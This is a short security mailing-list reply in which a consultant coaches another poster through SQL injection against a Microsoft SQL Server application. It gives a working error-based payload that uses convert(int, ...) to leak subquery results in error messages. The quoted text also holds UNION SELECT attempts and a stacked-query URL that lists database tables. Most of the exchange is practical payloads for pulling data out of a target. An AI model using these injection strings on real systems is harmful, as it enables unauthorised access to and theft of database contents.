Re: sql injection - operand type clash

["Kevin Spett" <kspett () spidynamics com>]

> Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
> Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: ntext is
> incompatible with int
>
> I have tried
>
> union select username,1,1,.... (20+ columns) from table
> union select 1,username,1,1....
> union select 1,1,username,1...

Yeah, that can eat up some time.
Try using the convert() hack to get the result of your query back in an
error message.  Assuming that you're dealing with a quoted vulnerability try
this injection string:
' %2b convert(int, (SELECT TOP 1 fieldname FROM table WHERE fieldname NOT IN
('knownvalue', 'knownvalue2'))) %2b '

You should get a convert error back that includes the result of the
subquery.

> I've also tried  union select convert(sql_variant,username),1,1,...

I think sql_variant only works in the most recent version of SQL Server, so
it may not even be a recognized data type

> My second problem is that I cannot execute this:
http://target/da.asp?userid=user' or 1=1; select * from
information_schema.tables--

You're not likely to get the results of a stacked query in your returned
page.  Stacking queries is mostly useful for executing stored procedures.


Good luck.

Kevin Spett
SPI Dynamics, Inc.


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/